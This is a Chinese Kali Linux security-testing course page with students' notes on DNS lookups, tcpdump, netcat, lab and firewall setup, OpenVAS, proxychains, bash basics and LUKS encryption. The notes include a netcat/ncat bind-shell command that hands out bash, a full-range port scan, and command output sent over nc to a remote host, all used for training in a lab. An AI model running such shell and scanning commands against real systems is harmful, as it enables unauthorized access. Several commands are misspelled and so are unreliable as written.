846人加入学习
(36人评价)
Kali Linux安全测试

爆款好课 NO.1

价格 ¥ 599.00
该课程属于 武官课程 请加入后再学习

nslookup
     set type(或者用)=mx
    set type=a
     set type=ns
     set q=ptr
     server 8.8.8.8  (更换DNS服务器,更换后会导致解析的ip地址不同,因为采用的是只能DNS)
     set q=any
      (text结果显示的是spf记录,用来做反垃圾邮件,通过spf反向查询,域名与来源ip是否一致,如果一致匹配上,证明是正确的邮件服务器发来的 ,而不是伪造的邮件)
        nslookup -q=any 163.com 114.114.114.114(指定特定dns来解析any记录)
        (做一下dns上的spf,这样可以让设定spf的接收方接受邮件)

[展开全文]

tcpdump:

    tcpdump -i eth0 -s 0 -w a.cap(-i指定端口 -s指定大小,0为有多少抓多少 -w写入到那个文件)
    tcpdupmp -r a.cap(读取抓包,加-A 以asc码方式显示,加-X 以十六进制读取)
    tcpdump -i eth0 tcp port 22 (指定筛选抓包,且不存文件实时显示)

过程文档记录:
Dradis (短期临时小团队文件共享/各种插件导入文件)
keepnote
truecrypt
 

[展开全文]

SYN
SYN,ACK
ACK
(三次握手)
(nc不加密)A:  nc -lp 333 -c bash
B:  nc -nv 10.1.1.1 333

(ncat加密)A:ncat -lp 333 -c bash --ssl
B: ncat -nv 10.1.1.1 333 --ssl

三种软件: wireshark /          sniffer/             cascad pilot(riverbed收购)

[展开全文]

一般防火墙都会禁止远程连接,所以可以通过受控段主动提供bas

man nc(系统软件调用手册)(不同系统的nc使用方法不同)

wireshark 会有个权限的报错,直接跳过就可以。

[展开全文]

nc -nvz 10.1.1.1 1-65535 (默认扫描TCP端口)
nc -nvzu 10.1.1.1 1-65535(扫描utp端口)

电子取证,要拷贝磁盘级的拷贝。(dd命令,硬盘块级别)

[展开全文]

NC-------不建议用它进行域名解析,直接搞ip+端口
nc -h 查看帮助
(mtr 220.118.18.11 追踪路由)
-v(显示详细信息)
-n(不进行DNS解析)
(base64  然后 输入要改换的东西,再用USER   ****  来登陆)

   传输文本信息,需要首先一台机器打开一个端口(listening    nc -l -p 4444打开4444端口,侦听),再用另外一台机器连接这个端口(nc -nv ‘ip’ 4444)
    电子取证时,要尽可能减少数据的增删,可以通过先打开目的主机的 nc 开端口,再用个人主机通过通道来获取信息(ls -l | nc -nv 4444   ////////  ps aux | nc -nv 10.1.1.10 4444 -q 1 这里-q 1是指执行完命令后间隔一秒断开,为了确定是不是结束 )再另外一端可以 nc -l -p 4444>lsof.txt这样将收到的信息存储到文档中

[展开全文]

初始化aql:sudo mysql -initialize
一系列安装配置:mysql_secure_installation配置完成它

进入mysql:mysql -u root -p
再安装php5及其基本组件: sudo apt-get install php5-mysql php-pear php5-mcrypt php5-curl
创建php页面来测试安装:cd /var/www/html,然后 ls然后新建个网页 vi 1.php
       <?php phpinfo();?>
       ie打开 ip/1.php
然后删除 sudo rm 1.php
 sudo init 0 (0-6各个状态)关机Metasploitable2
有个问题,不能完成测试:
cd /var/www/mutillidac/
sudo vi config.inc
其中 需要改成dbname=‘owasp10’(首先要用sudo su root 的权限 再用nano打开编辑)

m0n0wall防火墙的设定
首先要在virtualbox设置全局设定,创建一个“仅主机Host-Only网络”新创建一个网卡,(10.1.1.1 /10.1.2.1),m0n0虚拟机要四个网卡启用,网卡一桥接,网卡二host-only(使用第一个虚拟网卡),网卡三host-only(使用第二个虚拟网卡),启动后首先选择光驱iso文件,然后启动后先(7.install)安装,设置完名称之后,会重启,重启前要关闭掉光驱,否则会再次进去安装,再次进入系统,选择(1.assign)设置网口,yes设置网络通信,再设置三块网卡的vlan tag(em0 10vlan/em1 11vlan/em2 12vlan),再将em1设置成接入lan,再将em0接入wan接口,再将em2设置为dmz(option1)区的接口------重启后在选择(2)给lan口设置ip地址10.1.1.10   掩码为24位(三个255)启用dhcp,在输入网段起始地址10.1.1.20,终止10.1.1.100,81个地址,此时可以通过web界面配置了,但是还要(3)先设置下web界面的密码,就可以用虚拟机链接了。

打开linux,选择网络是第一块网卡,记得全局设定的DHCP,这样才能分配到指定ip,打开浏览器,10.1.1.10, admin   mono
,进去后先配置网卡接口,lan口已经配置好了,wan口用DHCP,opt接口启用,指定10.1.2.10
上网要设置rules,action=pass  protocal=any   source设置来源例如lan,那么只有lan内局域网可以上网  ,调整规则,②默认的wan口上面,最后有一个选项是block所有的数据包通信。

[展开全文]
aveng · 2017-06-11 · 实验环境 0

检查端口:netstat - pantu | grep 939

openvas -check setup 检查系统安装完成

openvas- feed- update 更新

https://129.0.0.1:9392

[展开全文]
红黄蓝 · 2017-06-08 · NMAP 0

chown -R root:root 文件 (将文件及其子目录用户组全部改成root)

crul -v http://www.sina.com (访问网页的html)

wget 下载网址(下载文件)

------------------------------------------------    代理设置

网页
/etc/apt/apt.conf

Acaquire::ftp::Proxy "ftp://127.0.0.1:8087/";

Acaquire::http::Proxy"ftp://127.0.0.1:8087/";

Acaquire::https::Proxy"ftp://127.0.0.1:8087/";

Acaquire::soucks::Proxy"ftp://127.0.0.1:8087/";

命令行

export ftp_proxy="ftp://user:password@proxyIP:port"

export http_proxy="ftp://user:password@proxyIP:port"

export https_proxy="ftp://user:password@proxyIP:port"

export socks_proxy="ftp://user:password@proxyIP:port"

----------------------------------------------------

代理链proxychain软件(linux强大访问软件)
公开的代理服务器
配置代理链    vi /etc/proxychains.conf

#proxychains iceweasel

 

[展开全文]
aveng · 2017-06-04 · 洋葱路由 0

tar zxvf 文件夹
ls
mv jdk文件 /opt/  将文件夹移动到bin中
cd /user/bin/
ls -d java 只看java目录这一级别
打开确认java过去了
update-alternatives --install /usr/bin/java java /opt/jdk文件/bin/java 1
update-alternatives --install /usr/bin/javac javac /opt/jdk1.7.0_45/bin/javac 1
update-alternatives --install /usr/lib/mozilla/plugins/libjavaplugin.so mozilla-javaplugin.so /opt/jdk1.7.0_45/jre/lib/amd64/libnpjp2.so 1

update-alternatives --set java /opt/jdk1.7.0_45/bin/java
update-alternatives --set javac /opt/jdk1.7.0_45/bin/javac
update-alternatives --set mozilla-javaplugin.so /opt/jdk1.7.0_45/jre/lib/amd64/libnpjp2.so

GPU安装内核驱动,才能利用GPU跑密码

ulimit限制当前窗口线程
vi .bashrc (编辑此文件永久限制)中写入 ulimite -n 900000(这样永久限制打开文件数为900000)

hdparm -i /dev/sda if AdvancedPM=yes then hdparm -B 1 -S 12 /dev/sda

 

[展开全文]

安装virtualbox 增强功能

先apt-get install linux-headers-¥(uname -r)
然后设备-安装增强功能
拷贝出vboxlinuxadditions.run
cd Desktop 然后ls
ls -l 查看权限
chmod+x VBoxLlinuxAdditions.run赋予执行权限
ls -l查看权限,绿色证明可执行
./VBoxLinuxAdditons.run 开始安装 (./)
 

[展开全文]

客户端拿到的是sessionID,session存在服务端

cookie中存储sessionID 

[展开全文]

snort

security onion

tcpreplay

 

[展开全文]

kali个性化

dhclient eth0

ifconfig eth0 192.168.1.10/24(指定eth0网卡ip为192.168.1.10,掩码为24位)

route add default gw 192.168.1.1(指定网关,之后netatat -nr 查看)

route add -net 172.16.0.0/24 gw 192.169.1.100 eth0(配置网卡路由地址以及添加路由,-net    :表示后面接的路由为一个网域;指定eth0静态路由发出。指定网关)

配置DNS服务器地址----------配置文件为/etc/resolv.conf           例如: echo nameserver 192.168.1.1 >resolv.conf  将1.1写入到resolv这个DNS配置文件,也可以通过vi命令手动编辑。

=============以上为手动临时指定===
vi /etc/network/interfaces 网卡配置文件(永久更改)  :将 dhcp改为static ,下面手动输入 adress 192.168.0.1
netmask 255.255.255.0
gateway 192.168.20.2
===========以上必须配置=======
也可以写上 dns-nameserbers
其次up route add -net 172.16.5.0/24 gw 192.168.10.100 eth1(网卡启动后写入这个配置)
 down route del -net 172.24.0.0/24(网卡关闭删除这个配置)
==========================
apt-get update (更新索引文件)
apt-get upgrade(更新程序)
报告错误即 apt-get update --fix-missing
另外因为更新源在国外,所以速度慢,我们可以更换为国内更新源  vi /etc/apt/sources.list(先注释掉#deb,再写入科技大学的更新源,逐行拷贝)

deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free

主要用滚动源deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

apt-get dis-upgrade(debian大版本的更新)
 

[展开全文]

BASH命令学

linux 是B shell:绿色----可执行文件   蓝色---目录   白色---普通文件  红色----压缩包文件

clear----清屏

ls------列目录                                             (-l 显示日期等内容  d头为目录  -开头为文件  c开头为设备文件  l开头为链接 b开头为block即块文件)                                                     (-a多显示以 .开头的文件为隐藏文件)          (-h以容易阅读文件呈现文件大小)               (ls -lh --sort=size   以大小排序显示 )           (ls -lh --sort=time 以日期排序)

cd-----进入目录                                                (cd. 当前目录)      (cd..进入当前目录上级)    pwd-----查看当前工作目录

cat----查看文件内容  例如:cat /var/log/messages                                                 内容太多可以通过more /bar/log/messages逐屏查看文件回车查看下一页,q退出                less /var/log/messages 不显示百分比          tail -20 /var/log/messages查看最后二十行命令(配合watch命令 watch -n 2 tail -20 /var/log/messages每隔两秒钟查看最新二十行messages系统变化,ctrl+c退出)(cat /etc/passwd查看账号)

rm------加文件名,删除文件

cp-------加文件名,copy文件,                例如:cp ps ps1  拷贝ps命名为ps1              cp -r Agent/   A 拷贝文件夹  rm -r  A 删除A

top------查看进程及系统状态,全屏下输入k,杀死进程。 q退出

ps-------专门查看进程(-ef 查看详情) (ps aux 显示cpu内存等)

grep ssh /etc/passwd------------只显示ssh这一行信息

ifconfig----查看当前网络信息  (ifconfig eth0 down 关掉网卡  再macchanger -m 00:11:11:11:11:11 eth0将网卡改为这个mac地址,再通过ifconfig eth0 up启动网卡)

netstate -pantu  查看当前计算机与哪些网络服务器产生tcp与udp连接,

==========小插曲============

linux无法打开优酷,首先确定本机无网络问题,在查看虚拟机,ping后发现返回 unknown host 一定是DNS解析出现问题,再cat /etc/resolv.conf查看DNS配置文件,再vi /etc/resolv.conf 修改DNS服务器地址为本机地址。

==========小插曲============

管道:可以将多个命令,通过同一行输入  例如:netstat -pantu | egrep -v ‘0.0.0.0|:::’| awk '{print $5}'  (第一管道是去除0.0.0.0和:::,awk是显示第五块数据)  netstat -pantu | egrep -v ‘0.0.0.0|:::’| awk '{print $5}' | egrep -v 'and|Address' | cut -d ':'-f 1(最后的cut也是分块,以:为标记,显示第1块)    netstat -pantu | egrep -v ‘0.0.0.0|:::’| awk '{print $5}' | egrep -v 'and|Address' | cut -d ':'-f 1 | sort | uniq(sort分类,uniq显示不重复)netstat -pantu | egrep -v ‘0.0.0.0|:::’| awk '{print $5}' | egrep -v 'and|Address' | cut -d ':'-f 1 | sort | uniq > ip (输出至ip这个文件中,>>追加而不覆盖)

mount---挂载目录  例如 mount -o loop kali.iso /media/cdrom (将ios挂载在cdrom在通过cd打开)

dmesg-------等同于tail查看/var/log/messages

find----查找安装完的文件或目录  例如:find / -name nmap  从根目录查找所有带有nmap的文件                         find / -iname namap  不区分大小写nmap            find . -name "ps*" -exec cp {}  /tmp/{}.bak \;查找还有ps什么的文件,在附加操作,再复制结果到 tmp下 存为bak格式,最后结束命令
whereis nmap-----查找比find范围小,查找的是本地数据库中记录的应用路径(源码安装不是本地包管理安装,所以不能找到源码安装文件)    whereis -b nmap(查找二进制可执行文件,首先 updatedb一下,这样可以查找最新内容)

echo “hello world”----显示信息

vi----是vim编辑器的简称,首先进入命令模式,输入:来输入(:set nu 显示行号)(:wq 修改保存退出)(摁i,进入编辑状态)(摁esc 退回命令模式)(选行后摁a来添加,摁dd删除所在行,摁o再当前行下插入行,摁y对当前行复制,摁p黏贴)

管道符:( cat /etc/passwd | grep ssl只显示ssl)(cat /etc/passwd & grep ssl  依次执行)(两个&,前面执行成功才执行后面的)(两个|,前面都没成功才执行后面的)

===========开始写脚本辣=======

先 vi 1.sh                                                      第一行 #!/bin/bash(默认起始行)            echo -n“IP:”(光标不换行,在:后)          read ip(定义ip变量)                                      echo“your ip is :”$ip
保存退出
chmod +x 1.sh(赋予可执行权限)
ls -l  1.sh(查看权限)
./1.sh(执行脚本)
 

[展开全文]

本节课是基于live版优盘linux的安装以及加密分区的划分。

dmesg----看一哈你插得对不对啊。是不是sdb,不是sda硬盘别整错咯

GParted(工具)-----先选择对sdb优盘,然后卸载分区,再删除分区,再通过绿色小对勾确定彻底清空

dd命令---------- if(input file 文件拷贝来源)=镜像文件 of(output file 复制给优盘)=/dev/sdb  bs(块复制大小)=1M---------------查看进度 watch -n 5(每五秒) killall -USR1 dd

LUKS:linux unified key setup  磁盘分区级加密-----------分前后端  前端命令cryptesetup --verbose --verfy-passphrase luksFormat /dev/sdb3 (对sdb3进行加密)   cryptsetup luksOpen /dev/sdb3 usb(打开加密位置挂载usb,输入密码后 ls /dev/mapper/usb,之后可以通过mkfs. ext4 /dev/mapper/usb进行文件系统级格式化,再用 e2label /dev/mapper/usb persistence luks必须要求用persistence设置卷标,先创建一个名为usb的目录mkdir -p /mnt/usb,再mount /dev/mapper/usb /munt/usb/只有先创建目录才可以通过目录mount文件,最后echo“/union“>/mnt/usb/persistence.conf配置文件用于运行持久linux时存储-------卸载挂载 umount /dev/mapper/usb,再关闭加密 cryptsetup luksClose /dev/mapper/usb) 

doxbox---windows 磁盘分区级加密

linux中的磁盘分区软件,终端下,执行命令parted---------print devices(列出所有设备)  select /dev/sdb (选定优盘) print(查看分区情况)  mkpart primary 3063 7063(划定主分区 3063起始至7063) quit(退出)

一些基本设置:字体等(gnome-tweak-tool)   流量监控(apt-get install netspeed)  工具栏应用添加(alt+右键)

[展开全文]

删除网卡

iw dev wlan0mon interface del

[展开全文]

无线路由器功率多大

采用定向天线还是全向天线

 

[展开全文]